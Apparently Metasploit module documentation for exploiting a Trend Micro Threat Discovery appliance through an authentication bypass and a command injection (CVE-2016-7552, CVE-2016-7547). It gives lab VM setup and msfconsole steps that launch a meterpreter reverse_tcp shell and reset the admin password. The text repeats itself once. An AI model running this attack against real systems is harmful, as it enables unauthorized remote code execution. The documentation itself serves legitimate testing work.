A file delete in the logoff.cgi interface that allows for an authentication bypass (CVE-2016-7552). A command injection in the admin_sys_time.cgi interface that allows for an attacker to gain remote code execution (CVE-2016-7547). Trend Micro are not patching this vulnerability since this product is now ([EOL](https://success.trendmicro.com/solution/1105727-list-of-end-of-life-eol-end-of-support-eos-trend-micro-products)). #### Installation List the steps needed to make sure this thing works * Download the ISO from (Trend Micro's) download site. * Setup the VM to have 2 NIC's, 100 Gig HD and 4096 RAM. * Click through the default install. * You are ready to burn. #### Verification List the steps needed to make sure this thing works * Start msfconsole * use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi * set payload linux/x86/meterpreter/reverse_tcp * set RHOST XXX.XXX.XXX.XXX * set LHOST XXX.XXX.XXX.XXX * check * Verify that the target is vulnerable. * exploit *...
A file delete in the logoff.cgi interface that allows for an authentication bypass (CVE-2016-7552). A command injection in the admin_sys_time.cgi interface that allows for an attacker to gain remote code execution (CVE-2016-7547). Trend Micro are not patching this vulnerability since this product is now ([EOL](https://success.trendmicro.com/solution/1105727-list-of-end-of-life-eol-end-of-support-eos-trend-micro-products)). #### Installation List the steps needed to make sure this thing works * Download the ISO from (Trend Micro's) download site. * Setup the VM to have 2 NIC's, 100 Gig HD and 4096 RAM. * Click through the default install. * You are ready to burn. #### Verification List the steps needed to make sure this thing works * Start msfconsole * use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi * set payload linux/x86/meterpreter/reverse_tcp * set RHOST XXX.XXX.XXX.XXX * set LHOST XXX.XXX.XXX.XXX * check * Verify that the target is vulnerable. * exploit * The exploit will reset the admin password, now reboot the VM. * Verify that you have rebooted the VM and that you receive a shell.
